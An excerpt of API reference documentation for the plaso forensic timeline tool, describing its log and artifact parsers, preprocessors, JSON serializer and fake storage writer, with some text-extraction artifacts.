ip_addressIP address from the connection.

Type str


Type int

terminal_identifierinittab identifier.

Type int

terminaltype of terminal.

Type str

typetype of login.

Type int

usernameuser name.

Type str

DATA_TYPE = 'linux:utmp:event'

class plaso.parsers.utmp.UtmpParserBases: plaso.parsers.dtfabric_parser.DtFabricBaseParser

Parser for Linux libc6 utmp files.

DATA_FORMAT = 'Linux libc6 utmp file'

NAME = 'utmp'



ParseFileObject(parser_mediator, file_object)Parses an utmp file-like object.

Parameters




plaso.parsers.utmpx module

Parser for utmpx files.

class plaso.parsers.utmpx.UtmpxMacOSEventDataBases: plaso.containers.events.EventData

MacOS utmpx event data.

hostnamehostname or IP address.

Type str


Type int

terminalname of the terminal.

Type str

terminal_identifierinittab identifier.

Type int

typetype of login.

Type int

usernameuser name.

Type str

DATA_TYPE = 'mac:utmpx:event'

class plaso.parsers.utmpx.UtmpxParserBases: plaso.parsers.dtfabric_parser.DtFabricBaseParser

Parser for Mac OS X 10.5 utmpx files.

DATA_FORMAT = 'Mac OS X 10.5 utmpx file'






NAME = 'utmpx'

ParseFileObject(parser_mediator, file_object)Parses an UTMPX file-like object.

Parameters




plaso.parsers.vsftpd module

Parser for vsftpd Logs.

class plaso.parsers.vsftpd.VsftpdEventDataBases: plaso.containers.events.EventData

vsftpd Log event data.

textvsftpd log message.

Type str

DATA_TYPE = 'vsftpd:log'

class plaso.parsers.vsftpd.VsftpdLogParserBases: plaso.parsers.text_parser.PyparsingSingleLineTextParser

Parses a vsftpd log.

DATA_FORMAT = 'vsftpd log file'

LINE_STRUCTURES = [('logline', {Group:({{{{{{{{W:(ABCD...) W:(ABCD...)} W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} W:(0123...)}) SkipTo:(lineEnd)})]

NAME = 'vsftpd'


Parameters





VerifyStructure(parser_mediator, line)Verify that this file is a vsftpd log file.

Parameters

• parser_mediator (ParserMediator) – mediates interactions between parsers andother components, such as storage and dfVFS.





Return type bool

plaso.parsers.winevt module

Parser for Windows EventLog (EVT) files.

class plaso.parsers.winevt.WinEvtParserBases: plaso.parsers.interface.FileObjectParser

Parses Windows EventLog (EVT) files.

DATA_FORMAT = 'Windows EventLog (EVT) file'




NAME = 'winevt'

ParseFileObject(parser_mediator, file_object)Parses a Windows EventLog (EVT) file-like object.

Parameters



class plaso.parsers.winevt.WinEvtRecordEventDataBases: plaso.containers.events.EventData

Windows EventLog (EVT) record event data.

computer_namecomputer name stored in the event record.

Type str

event_categoryevent category.

Type int

event_identifierevent identifier.

Type int

event_typeevent type.

Type int

facilityevent facility.

Type int

message_identifierevent message identifier.



Type int

record_numberevent record number.

Type int

recoveredTrue if the record was recovered.

Type bool

severityevent severity.

Type int

source_namename of the event source.

Type str

stringsevent strings.

Type list[str]

user_siduser security identifier (SID) stored in the event record.

Type str

DATA_TYPE = 'windows:evt:record'

plaso.parsers.winevtx module

Parser for Windows XML EventLog (EVTX) files.

class plaso.parsers.winevtx.WinEvtxParserBases: plaso.parsers.interface.FileObjectParser

Parses Windows XML EventLog (EVTX) files.

DATA_FORMAT = 'Windows XML EventLog (EVTX) file'




NAME = 'winevtx'

ParseFileObject(parser_mediator, file_object)Parses a Windows XML EventLog (EVTX) file-like object.

Parameters





class plaso.parsers.winevtx.WinEvtxRecordEventDataBases: plaso.containers.events.EventData

Windows XML EventLog (EVTX) record event data.

computer_namecomputer name stored in the event record.

Type str

event_identifierevent identifier.

Type int

event_levelevent level.

Type int

message_identifierevent message identifier.

Type int

record_numberevent record number.

Type int

recoveredTrue if the record was recovered.

Type bool

source_namename of the event source.

Type str

stringsevent strings.

Type list[str]

user_siduser security identifier (SID) stored in the event record.

Type str

xml_stringXML representation of the event.

Type str

DATA_TYPE = 'windows:evtx:record'



plaso.parsers.winfirewall module

Parser for Windows Firewall Log file.

class plaso.parsers.winfirewall.WinFirewallEventDataBases: plaso.containers.events.EventData

Windows Firewall event data.

actionaction taken.

Type str

protocolIP protocol.

Type str

source_ipsource IP address.

Type str

dest_ipdestination IP address.

Type str

source_portTCP or UDP source port.

Type int

dest_portTCP or UDP destination port.

Type int

sizesize of ???

Type int

flagsTCP flags.

Type str

tcp_seqTCP sequence number.

Type int

tcp_ackTCP ACK ???

Type int

tcp_winTCP window size ???

Type int

icmp_typeICMP type.



Type int

icmp_codeICMP code.

Type int

info???

Type str

path???

Type str

DATA_TYPE = 'windows:firewall:log_entry'

class plaso.parsers.winfirewall.WinFirewallParserBases: plaso.parsers.text_parser.PyparsingSingleLineTextParser

Parses the Windows Firewall Log file.

DATA_FORMAT = 'Windows Firewall log file'

LINE_STRUCTURES = [('comment', {"#" SkipTo:(LineEnd)}), ('logline', {{{{{{{{{{{{{{{Group:({{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) {{W:(ABCD...) | W:(ABCD...)} | Suppress:("-")}} {{W:(ABCD...) | W:(ABCD...)} | Suppress:("-")}} {{IPv4 address | IPv6 address} | Suppress:("-")}} {{IPv4 address | IPv6 address} | Suppress:("-")}} {W:(0123...) | Suppress:("-")}} {W:(0123...) | Suppress:("-")}} {W:(0123...) | Suppress:("-")}} {{W:(ABCD...) | W:(ABCD...)} | Suppress:("-")}} {W:(0123...) | Suppress:("-")}} {W:(0123...) | Suppress:("-")}} {W:(0123...) | Suppress:("-")}} {W:(0123...) | Suppress:("-")}} {W:(0123...) | Suppress:("-")}} {{W:(ABCD...) | W:(ABCD...)} | Suppress:("-")}} {{W:(ABCD...) | W:(ABCD...)} | Suppress:("-")}})]

NAME = 'winfirewall'


Parameters





VerifyStructure(parser_mediator, line)Verify that this file is a firewall log file.

Parameters




Return type bool



plaso.parsers.winjob module

Parser for Windows Scheduled Task job files.

class plaso.parsers.winjob.WinJobEventDataBases: plaso.containers.events.EventData

Windows Scheduled Task event data.

applicationpath to job executable.

Type str

descriptiondescription of the scheduled task.

Type str

parametersapplication command line parameters.

Type str

trigger_typetrigger type.

Type int

usernameusername that scheduled the task.

Type str

working_directoryworking directory of the scheduled task.

Type str

DATA_TYPE = 'windows:tasks:job'

class plaso.parsers.winjob.WinJobParserBases: plaso.parsers.dtfabric_parser.DtFabricBaseParser

Parse Windows Scheduled Task files for job events.

DATA_FORMAT = 'Windows Scheduled Task job (or at-job) file'

NAME = 'winjob'

ParseFileObject(parser_mediator, file_object)Parses a Windows job file-like object.

Parameters






plaso.parsers.winlnk module

Parser for Windows Shortcut (LNK) files.

class plaso.parsers.winlnk.WinLnkLinkEventDataBases: plaso.containers.events.EventData

Windows Shortcut (LNK) link event data.

birth_droid_file_identifierdistributed link tracking birth droid file identifier.

Type str

birth_droid_volume_identifierdistributed link tracking birth droid volume identifier.

Type str


Type str

descriptiondescription of the linked item.

Type str

drive_serial_numberdrive serial number where the linked item resides.

Type int

drive_typedrive type where the linked item resided.

Type str

droid_file_identifierdistributed link tracking droid file identifier.

Type str

droid_volume_identifierdistributed link tracking droid volume identifier.

Type str

env_var_locationenvironment variables loction.

Type str

file_attribute_flagsfile attribute flags of the linked item.

Type int

file_sizesize of the linked item.

Type int

icon_locationicon location.



Type str

link_targetshell item list of the link target.

Type str

local_pathlocal path of the linked item.

Type str

network_pathlocal path of the linked item.

Type str

relative_pathrelative path.

Type str

volume_labelvolume label where the linked item resided.

Type str

working_directoryworking directory.

Type str

DATA_TYPE = 'windows:lnk:link'

class plaso.parsers.winlnk.WinLnkParserBases: plaso.parsers.interface.FileObjectParser

Parses Windows Shortcut (LNK) files.

DATA_FORMAT = 'Windows Shortcut (LNK) file'




NAME = 'lnk'

ParseFileLNKFile(parser_mediator, file_object, display_name)Parses a Windows Shortcut (LNK) file-like object.

Parameters



• display_name (str) – display name.

ParseFileObject(parser_mediator, file_object)Parses a Windows Shortcut (LNK) file-like object.

Parameters





plaso.parsers.winprefetch module

Parser for Windows Prefetch files.

class plaso.parsers.winprefetch.WinPrefetchExecutionEventDataBases: plaso.containers.events.EventData

Windows Prefetch event data.

executableexecutable filename.

Type str

format_versionformat version.

Type int

mapped_filesmapped filenames.

Type list[str]

number_of_volumesnumber of volumes.

Type int

path_hintspossible full paths to the executable.

Type list[str]

prefetch_hashprefetch hash.

Type int

run_countrun count.

Type int

volume_device_pathsvolume device paths.

Type list[str]

volume_serial_numbersvolume serial numbers.

Type list[int]

DATA_TYPE = 'windows:prefetch:execution'

class plaso.parsers.winprefetch.WinPrefetchParserBases: plaso.parsers.interface.FileObjectParser

A parser for Windows Prefetch files.



DATA_FORMAT = 'Windows Prefetch File (PF)'




NAME = 'prefetch'

ParseFileObject(parser_mediator, file_object)Parses a Windows Prefetch file-like object.

Parameters



plaso.parsers.winreg module

Parser for Windows NT Registry (REGF) files.

class plaso.parsers.winreg.WinRegistryParserBases: plaso.parsers.interface.FileObjectParser

Parses Windows NT Registry (REGF) files.

DATA_FORMAT = 'Windows NT Registry (REGF) file'


NAME = 'winreg'

ParseFileObject(parser_mediator, file_object)Parses a Windows Registry file-like object.

Parameters



plaso.parsers.winrestore module

Parser for Windows Restore Point (rp.log) files.

class plaso.parsers.winrestore.RestorePointEventDataBases: plaso.containers.events.EventData

Windows Restore Point event data.


Type str

restore_point_event_typerestore point event type.

Type str



restore_point_typerestore point type.

Type str

sequence_numbersequence number.

Type str

DATA_TYPE = 'windows:restore_point:info'

class plaso.parsers.winrestore.RestorePointLogParserBases: plaso.parsers.dtfabric_parser.DtFabricBaseParser

A parser for Windows Restore Point (rp.log) files.

DATA_FORMAT = 'Windows Restore Point log (rp.log) file'

FILTERS = frozenset({<plaso.parsers.interface.FileNameFileEntryFilter object>})

NAME = 'rplog'

ParseFileObject(parser_mediator, file_object)Parses a Windows Restore Point (rp.log) log file-like object.

Parameters




plaso.parsers.xchatlog module

This file contains XChat log file parser in plaso.

Information updated 24 July 2013.

The parser applies to XChat log files. Despite their apparent simplicity it’s not straightforward to manage everypossible case. XChat tool allows users to specify how timestamp will be encoded (using the strftime function), byletting them to specify additional separators. This parser will accept only the simplest default English form of anXChat log file, as the following:

**** BEGIN LOGGING AT Mon Dec 31 21:11:55 2001dec 31 21:11:55 --> You are now talking on #gugledec 31 21:11:55 --- Topic for #gugle is plaso, nobody knows what it meansdec 31 21:11:55 Topic for #gugle set by Kristinndec 31 21:11:55 --- Joachim gives voice to fpidec 31 21:11:55 * XChat heredec 31 21:11:58 <fpi> ola plas-ing guys!dec 31 21:12:00 <Kristinn> ftw!

It could be managed the missing month/day case too, by extracting the month/day information from the header. Butthe parser logic would become intricate, since it would need to manage day transition, chat lines crossing the midnight.From there derives the last day of the year bug, since the parser will not manage that transition.

Moreover the strftime is locale-dependent, so month names, footer and headers can change, even inside the same logfile. Being said that, the following will be the main logic used to parse the log files (note that the first header must be‘**** BEGIN . . . ’ otherwise file will be skipped).



1) Check for ‘****’ 1.1) If ‘BEGIN LOGGING AT’ (English) 1.1.1) Extract the YEAR 1.1.2) Generate new event startlogging 1.1.3) set parsing = True 1.2) If ‘END LOGGING’ 1.2.1) If parsing, set parsing=False 1.2.2) If not parsing,log debug 1.2.3) Generate new event end logging 1.3) If not BEGIN|END we are facing a different language and wedon’t now which language! If parsing is True, set parsing=False and log debug 2) Not ‘****’ so we are parsing a line2.1) If parsing = True, try to parse line and generate event 2.2) If parsing = False, skip until next good header is found

References http://xchat.org

class plaso.parsers.xchatlog.XChatLogEventDataBases: plaso.containers.events.EventData

XChat Log event data.

nicknamenickname.

Type str

texttext sent by nickname or other text (server, messages, etc.).

Type str

DATA_TYPE = 'xchat:log:line'

class plaso.parsers.xchatlog.XChatLogParserBases: plaso.parsers.text_parser.PyparsingSingleLineTextParser

Parse XChat log files.

DATA_FORMAT = 'XChat log file'

LINE_STRUCTURES = [('logline', {{Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) [quoted string, starting with < ending with >]} SkipTo:(lineEnd)}), ('header', {{Suppress:("****") Group:({{W:(0123...) W:(0123...)} W:(0123...)})} Group:({{{{Group:({{{{{{"Sun" | "Mon"} | "Tue"} | "Wed"} | "Thu"} | "Fri"} | "Sat"}) W:(ABCD...)} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}} W:(0123...)})}), ('header_signature', "****")]

NAME = 'xchatlog'


Parameters





VerifyStructure(parser_mediator, line)Verify that this file is a XChat log file.

Parameters




Return type bool


http://xchat.org


plaso.parsers.xchatscrollback module

This file contains XChat scrollback log file parser in plaso.

Information updated 06 September 2013.

Besides the logging capability, the XChat IRC client has the option to record the text for opened tabs. So, whenrejoining a particular channel and/or a particular conversation, XChat will display the last messages exchanged. Thisartifact could be present, if not disabled, even if normal logging is disabled.

From the XChat FAQ (http://xchatdata.net/Using/FAQ):

Q: ‘How do I keep text from previous sessions from being displayed when I join a channel?’ R: ‘Starting in XChat2.8.4, XChat implemented the Scrollback feature which displays text from the last time you had a particular tab open.To disable this setting for all channels, Go to Settings -> Preferences -> Logging and uncheck Display scrollback fromprevious session. In XChat 2.8.6, XChat implemented both Per Channel Logging, and Per Channel Scrollbacks. Ifyou are on 2.8.6 or newer, you can disable loading scrollback for just one particular tab name by right clicking on thetab name, selecting Settings, and then unchecking Reload scrollback’

The log file format differs from logging format, but it’s quite simple ‘T 1232315916 Python interface unloaded’<T><space><decimal timestamp><space><text>< >

The time reported in the log is the number of seconds since January 1, 1970 00:00:00 UTC (from source code, time(0)).The <text> part could contain some ‘decorators’ (bold, underline, colors indication, etc.), so the parser should stripthose control fields.

References http://xchat.org

class plaso.parsers.xchatscrollback.XChatScrollbackEventDataBases: plaso.containers.events.EventData

XChat Scrollback line event data.

nicknamenickname.

Type str

texttext sent by nickname service messages.

Type str

DATA_TYPE = 'xchat:scrollback:line'

class plaso.parsers.xchatscrollback.XChatScrollbackParserBases: plaso.parsers.text_parser.PyparsingSingleLineTextParser

Parses XChat scrollback log files.

DATA_FORMAT = 'XChat scrollback log file'

LINE_STRUCTURES = [('logline', {{Suppress:("T") W:(0123...)} SkipTo:(LineEnd)})]

LOG_LINE = {{Suppress:("T") W:(0123...)} SkipTo:(LineEnd)}

MSG_ENTRY = {[{{"<" SkipTo:(">")} ">"}] SkipTo:(LineEnd)}

MSG_ENTRY_NICK = [{{"<" SkipTo:(">")} ">"}]

MSG_ENTRY_TEXT = SkipTo:(LineEnd)

MSG_NICK = SkipTo:(">")

MSG_NICK_END = ">"


http://xchatdata.net/Using/FAQ

http://xchat.org


MSG_NICK_START = "<"

NAME = 'xchatscrollback'

ParseRecord(parser_mediator, key, structure)Parses a log record structure.

Parameters




STRIPPER = {Suppress:(W:(, 0123...)) | Suppress:(W:(...))}

VerifyStructure(parser_mediator, line)Verify that this file is a XChat scrollback log file.

Parameters




Return type bool

plaso.parsers.zsh_extended_history module

Parser for ZSH extended_history files.

The file format is described here: http://zsh.sourceforge.net/Doc/Release/Options.html#index-EXTENDEDHISTORY

class plaso.parsers.zsh_extended_history.ZshExtendedHistoryParserBases: plaso.parsers.text_parser.PyparsingMultiLineTextParser

Parser for ZSH extended history files

DATA_FORMAT = 'ZSH extended history file'

LINE_STRUCTURES = [('command', {{{{{{":" W:(0123...)} ":"} W:(0123...)} ";"} Re:('.+?(?=($|\\n:\\s\\d+:\\d+;))')} LineEnd})]

NAME = 'zsh_extended_history'

ParseRecord(parser_mediator, key, structure)Parses a record and produces a ZSH history event.

Parameters





VerifyStructure(parser_mediator, lines)Verifies whether content corresponds to a ZSH extended_history file.


http://zsh.sourceforge.net/Doc/Release/Options.html#index-EXTENDEDHISTORY


Parameters




Return type bool

class plaso.parsers.zsh_extended_history.ZshHistoryEventDataBases: plaso.containers.events.EventData

ZSH history event data.

commandcommand that was run.

Type str

elapsed_secondsnumber of seconds that the command took to execute.

Type int

DATA_TYPE = 'shell:zsh:history'

Module contents

This file imports Python modules that register parsers.

5.1.12 plaso.preprocessors package

Submodules

plaso.preprocessors.interface module

This file contains classes used for preprocessing in plaso.

class plaso.preprocessors.interface.ArtifactPreprocessorPluginBases: object

The artifact preprocessor plugin interface.

The artifact preprocessor determines preprocessing attributes based on an artifact definition defined by ARTI-FACT_DEFINITION_NAME.

ARTIFACT_DEFINITION_NAME = None

class plaso.preprocessors.interface.FileArtifactPreprocessorPluginBases: plaso.preprocessors.interface.FileEntryArtifactPreprocessorPlugin

File artifact preprocessor plugin interface.

Shared functionality for preprocessing attributes based on a file artifact definition, such as file or path.

class plaso.preprocessors.interface.FileEntryArtifactPreprocessorPluginBases: plaso.preprocessors.interface.FileSystemArtifactPreprocessorPlugin

File entry artifact preprocessor plugin interface.

Shared functionality for preprocessing attributes based on a file entry artifact definition, such as file or path.



class plaso.preprocessors.interface.FileSystemArtifactPreprocessorPluginBases: plaso.preprocessors.interface.ArtifactPreprocessorPlugin

File system artifact preprocessor plugin interface.

Shared functionality for preprocessing attributes based on a file system artifact definition, such as file or path.

Collect(knowledge_base, artifact_definition, searcher, file_system)Collects values using a file artifact definition.

Parameters

• knowledge_base (KnowledgeBase) – to fill with preprocessing information.

• artifact_definition (artifacts.ArtifactDefinition) – artifact defini-tion.

• searcher (dfvfs.FileSystemSearcher) – file system searcher to preprocess thefile system.

• file_system (dfvfs.FileSystem) – file system to be preprocessed.

Raises PreProcessFail – if the preprocessing fails.

class plaso.preprocessors.interface.KnowledgeBasePreprocessorPluginBases: object

The knowledge base preprocessor plugin interface.

The knowledge base preprocessor determines preprocessing attributes based on other values in the knowledgebase.

abstract Collect(knowledge_base)Collects values from the knowledge base.

Parameters knowledge_base (KnowledgeBase) – to fill with preprocessing information.


class plaso.preprocessors.interface.WindowsRegistryKeyArtifactPreprocessorPluginBases: plaso.preprocessors.interface.ArtifactPreprocessorPlugin

Windows Registry key artifact preprocessor plugin interface.

Shared functionality for preprocessing attributes based on a Windows Registry artifact definition, such as Win-dows Registry key or value.

Collect(knowledge_base, artifact_definition, searcher)Collects values using a Windows Registry value artifact definition.

Parameters


• artifact_definition (artifacts.ArtifactDefinition) – artifact defini-tion.

• searcher (dfwinreg.WinRegistrySearcher) – Windows Registry searcher topreprocess the Windows Registry.

Raises PreProcessFail – if the Windows Registry key or value cannot be read.

class plaso.preprocessors.interface.WindowsRegistryValueArtifactPreprocessorPluginBases: plaso.preprocessors.interface.WindowsRegistryKeyArtifactPreprocessorPlugin

Windows Registry value artifact preprocessor plugin interface.



Shared functionality for preprocessing attributes based on a Windows Registry value artifact definition.

plaso.preprocessors.linux module

This file contains preprocessors for Linux.

class plaso.preprocessors.linux.LinuxDistributionPluginBases: plaso.preprocessors.interface.FileArtifactPreprocessorPlugin

The Linux distribution plugin.

ARTIFACT_DEFINITION_NAME = 'LinuxDistributionRelease'

class plaso.preprocessors.linux.LinuxHostnamePluginBases: plaso.preprocessors.interface.FileArtifactPreprocessorPlugin

The Linux hostname plugin.

ARTIFACT_DEFINITION_NAME = 'LinuxHostnameFile'

class plaso.preprocessors.linux.LinuxIssueFilePluginBases: plaso.preprocessors.interface.FileArtifactPreprocessorPlugin

The Linux issue file plugin.

ARTIFACT_DEFINITION_NAME = 'LinuxIssueFile'

class plaso.preprocessors.linux.LinuxStandardBaseReleasePluginBases: plaso.preprocessors.interface.FileArtifactPreprocessorPlugin

The Linux standard base (LSB) release plugin.

ARTIFACT_DEFINITION_NAME = 'LinuxLSBRelease'

class plaso.preprocessors.linux.LinuxSystemdOperatingSystemPluginBases: plaso.preprocessors.interface.FileArtifactPreprocessorPlugin

The Linux systemd operating system release plugin.

ARTIFACT_DEFINITION_NAME = 'LinuxSystemdOSRelease'

class plaso.preprocessors.linux.LinuxTimeZonePluginBases: plaso.preprocessors.interface.FileEntryArtifactPreprocessorPlugin

Linux time zone plugin.

ARTIFACT_DEFINITION_NAME = 'LinuxLocalTime'

class plaso.preprocessors.linux.LinuxUserAccountsPluginBases: plaso.preprocessors.interface.FileArtifactPreprocessorPlugin

The Linux user accounts plugin.

ARTIFACT_DEFINITION_NAME = 'LinuxPasswdFile'



plaso.preprocessors.logger module

The preprocessors sub module logger.

plaso.preprocessors.macos module

This file contains preprocessors for MacOS.

class plaso.preprocessors.macos.MacOSHostnamePluginBases: plaso.preprocessors.macos.PlistFileArtifactPreprocessorPlugin

MacOS hostname plugin.

ARTIFACT_DEFINITION_NAME = 'MacOSSystemConfigurationPreferencesPlistFile'

class plaso.preprocessors.macos.MacOSKeyboardLayoutPluginBases: plaso.preprocessors.macos.PlistFileArtifactPreprocessorPlugin

MacOS keyboard layout plugin.

ARTIFACT_DEFINITION_NAME = 'MacOSKeyboardLayoutPlistFile'

class plaso.preprocessors.macos.MacOSSystemVersionPluginBases: plaso.preprocessors.macos.PlistFileArtifactPreprocessorPlugin

MacOS system version information plugin.

ARTIFACT_DEFINITION_NAME = 'MacOSSystemVersionPlistFile'

class plaso.preprocessors.macos.MacOSTimeZonePluginBases: plaso.preprocessors.interface.FileEntryArtifactPreprocessorPlugin

MacOS time zone plugin.

ARTIFACT_DEFINITION_NAME = 'MacOSLocalTime'

class plaso.preprocessors.macos.MacOSUserAccountsPluginBases: plaso.preprocessors.interface.FileEntryArtifactPreprocessorPlugin

MacOS user accounts plugin.

ARTIFACT_DEFINITION_NAME = 'MacOSUserPasswordHashesPlistFiles'

class plaso.preprocessors.macos.PlistFileArtifactPreprocessorPluginBases: plaso.preprocessors.interface.FileArtifactPreprocessorPlugin

Plist file artifact preprocessor plugin interface.

Retrieves values from a plist file artifact using names of keys defined in _PLIST_KEYS.

plaso.preprocessors.manager module

The preprocess plugins manager.

class plaso.preprocessors.manager.PreprocessPluginsManagerBases: object

Preprocess plugins manager.

classmethod CollectFromFileSystem(artifacts_registry, knowledge_base, searcher,file_system)

Collects values from Windows Registry values.

Parameters



• artifacts_registry (artifacts.ArtifactDefinitionsRegistry) –artifacts definitions registry.


• searcher (dfvfs.FileSystemSearcher) – file system searcher to preprocess thefile system.


classmethod CollectFromKnowledgeBase(knowledge_base)Collects values from knowledge base values.


classmethod CollectFromWindowsRegistry(artifacts_registry, knowledge_base, searcher)Collects values from Windows Registry values.

Parameters



• searcher (dfwinreg.WinRegistrySearcher) – Windows Registry searcher topreprocess the Windows Registry.

classmethod DeregisterPlugin(plugin_class)Deregisters an preprocess plugin class.

Parameters plugin_class (type) – preprocess plugin class.

Raises

• KeyError – if plugin class is not set for the corresponding name.

• TypeError – if the source type of the plugin class is not supported.

classmethod GetNames()Retrieves the names of the registered artifact definitions.

Returns registered artifact definitions names.


classmethod RegisterPlugin(plugin_class)Registers an preprocess plugin class.

Parameters plugin_class (type) – preprocess plugin class.

Raises

• KeyError – if plugin class is already set for the corresponding name.

• TypeError – if the source type of the plugin class is not supported.

classmethod RegisterPlugins(plugin_classes)Registers preprocess plugin classes.

Parameters plugin_classes (list[type]) – preprocess plugin classes.


classmethod RunPlugins(artifacts_registry, file_system, mount_point, knowledge_base)Runs the preprocessing plugins.

Parameters





• mount_point (dfvfs.PathSpec) – mount point path specification that refers to thebase location of the file system.


plaso.preprocessors.windows module

This file contains preprocessors for Windows.

class plaso.preprocessors.windows.WindowsAllUsersAppDataKnowledgeBasePluginBases: plaso.preprocessors.interface.KnowledgeBasePreprocessorPlugin

The allusersdata knowledge base value plugin.

The allusersdata value is needed for the expansion of %%environ_allusersappdata%% in artifact definitions.

Collect(knowledge_base)Collects values from the knowledge base.



class plaso.preprocessors.windows.WindowsAllUsersAppProfileKnowledgeBasePluginBases: plaso.preprocessors.interface.KnowledgeBasePreprocessorPlugin

The allusersprofile knowledge base value plugin.

The allusersprofile value is needed for the expansion of %%environ_allusersappprofile%% in artifact definitions.

It is derived from %ProgramData% for versions of Windows, Vista and later, that do not define %AllUsersPro-file%.




class plaso.preprocessors.windows.WindowsAllUsersProfileEnvironmentVariablePluginBases: plaso.preprocessors.windows.WindowsEnvironmentVariableArtifactPreprocessorPlugin

The Windows %AllUsersProfile% environment variable plugin.

ARTIFACT_DEFINITION_NAME = 'WindowsEnvironmentVariableAllUsersProfile'

class plaso.preprocessors.windows.WindowsAvailableTimeZonesPluginBases: plaso.preprocessors.interface.WindowsRegistryKeyArtifactPreprocessorPlugin

The Windows available time zones plugin.

ARTIFACT_DEFINITION_NAME = 'WindowsAvailableTimeZones'

class plaso.preprocessors.windows.WindowsCodepagePluginBases: plaso.preprocessors.interface.WindowsRegistryValueArtifactPreprocessorPlugin

The Windows codepage plugin.

ARTIFACT_DEFINITION_NAME = 'WindowsCodePage'



class plaso.preprocessors.windows.WindowsEnvironmentVariableArtifactPreprocessorPluginBases: plaso.preprocessors.interface.WindowsRegistryValueArtifactPreprocessorPlugin

Windows environment variable artifact preprocessor plugin interface.

class plaso.preprocessors.windows.WindowsHostnamePluginBases: plaso.preprocessors.interface.WindowsRegistryValueArtifactPreprocessorPlugin

The Windows hostname plugin.

ARTIFACT_DEFINITION_NAME = 'WindowsComputerName'

class plaso.preprocessors.windows.WindowsPathEnvironmentVariableArtifactPreprocessorPluginBases: plaso.preprocessors.interface.FileSystemArtifactPreprocessorPlugin

Windows path environment variable plugin interface.

class plaso.preprocessors.windows.WindowsProgramDataEnvironmentVariablePluginBases: plaso.preprocessors.windows.WindowsEnvironmentVariableArtifactPreprocessorPlugin

The Windows %ProgramData% environment variable plugin.

ARTIFACT_DEFINITION_NAME = 'WindowsEnvironmentVariableProgramData'

class plaso.preprocessors.windows.WindowsProgramDataKnowledgeBasePluginBases: plaso.preprocessors.interface.KnowledgeBasePreprocessorPlugin

The programdata knowledge base value plugin.

The programdata value is needed for the expansion of %%environ_programdata%% in artifact definitions.

It is derived from %AllUsersProfile% for versions of Windows prior to Vista that do not define %ProgramData%.




class plaso.preprocessors.windows.WindowsProgramFilesEnvironmentVariablePluginBases: plaso.preprocessors.windows.WindowsEnvironmentVariableArtifactPreprocessorPlugin

The Windows %ProgramFiles% environment variable plugin.

ARTIFACT_DEFINITION_NAME = 'WindowsEnvironmentVariableProgramFiles'

class plaso.preprocessors.windows.WindowsProgramFilesX86EnvironmentVariablePluginBases: plaso.preprocessors.windows.WindowsEnvironmentVariableArtifactPreprocessorPlugin

The Windows %ProgramFilesX86% environment variable plugin.

ARTIFACT_DEFINITION_NAME = 'WindowsEnvironmentVariableProgramFilesX86'

class plaso.preprocessors.windows.WindowsSystemProductPluginBases: plaso.preprocessors.interface.WindowsRegistryValueArtifactPreprocessorPlugin

The Windows system product information plugin.

ARTIFACT_DEFINITION_NAME = 'WindowsProductName'

class plaso.preprocessors.windows.WindowsSystemRootEnvironmentVariablePluginBases: plaso.preprocessors.windows.WindowsPathEnvironmentVariableArtifactPreprocessorPlugin

The Windows %SystemRoot% environment variable plugin.

ARTIFACT_DEFINITION_NAME = 'WindowsEnvironmentVariableSystemRoot'



class plaso.preprocessors.windows.WindowsSystemVersionPluginBases: plaso.preprocessors.interface.WindowsRegistryValueArtifactPreprocessorPlugin

The Windows system version information plugin.

ARTIFACT_DEFINITION_NAME = 'WindowsCurrentVersion'

class plaso.preprocessors.windows.WindowsTimeZonePluginBases: plaso.preprocessors.interface.WindowsRegistryValueArtifactPreprocessorPlugin

The Windows time zone plugin.

ARTIFACT_DEFINITION_NAME = 'WindowsTimezone'

class plaso.preprocessors.windows.WindowsUserAccountsPluginBases: plaso.preprocessors.interface.WindowsRegistryKeyArtifactPreprocessorPlugin

The Windows user account plugin.

ARTIFACT_DEFINITION_NAME = 'WindowsRegistryProfiles'

class plaso.preprocessors.windows.WindowsWinDirEnvironmentVariablePluginBases: plaso.preprocessors.windows.WindowsPathEnvironmentVariableArtifactPreprocessorPlugin

The Windows %WinDir% environment variable plugin.

ARTIFACT_DEFINITION_NAME = 'WindowsEnvironmentVariableWinDir'

Module contents

Preprocessor.

5.1.13 plaso.serializer package

Submodules

plaso.serializer.interface module

The serializer object interfaces.

class plaso.serializer.interface.AttributeContainerSerializerBases: object

Class that implements the attribute container serializer interface.

abstract ReadSerialized(serialized)Reads an attribute container from serialized form.

Parameters serialized (object) – serialized form.

Returns attribute container.


abstract WriteSerialized(attribute_container)Writes an attribute container to serialized form.

Parameters attribute_container (AttributeContainer) – attribute container.

Returns serialized form.

Return type object



plaso.serializer.json_serializer module

The JSON serializer object implementation.

class plaso.serializer.json_serializer.JSONAttributeContainerSerializerBases: plaso.serializer.interface.AttributeContainerSerializer

JSON attribute container serializer.

classmethod ReadSerialized(json_string)Reads an attribute container from serialized form.

Parameters json_string (str) – JSON serialized attribute container.

Returns attribute container or None.


classmethod ReadSerializedDict(json_dict)Reads an attribute container from serialized dictionary form.

Parameters json_dict (dict[str, object]) – JSON serialized objects.

Returns attribute container or None.


Raises TypeError – if the serialized dictionary does not contain an AttributeContainer.

classmethod WriteSerialized(attribute_container)Writes an attribute container to serialized form.


Returns A JSON string containing the serialized form.

Return type str

classmethod WriteSerializedDict(attribute_container)Writes an attribute container to serialized form.


Returns JSON serialized objects.


plaso.serializer.logger module

The serializer sub module logger.

Module contents

5.1.14 plaso.storage package

Subpackages

plaso.storage.fake package

Submodules



plaso.storage.fake.writer module

Fake storage writer for testing.

class plaso.storage.fake.writer.FakeStorageWriter(session, storage_type='session',task=None)

Bases: plaso.storage.interface.StorageWriter

Fake storage writer object.

analysis_reportsanalysis reports.

Type list[AnalysisReport]

session_completionsession completion attribute container.

Type SessionCompletion

session_configurationsession configuration attribute container.

Type SessionConfiguration

session_startsession start attribute container.

Type SessionStart

task_completiontask completion attribute container.

Type TaskCompletion

task_starttask start attribute container.

Type TaskStart

AddAnalysisReport(analysis_report, serialized_data=None)Adds an analysis report.

Parameters

• analysis_report (AnalysisReport) – analysis report.

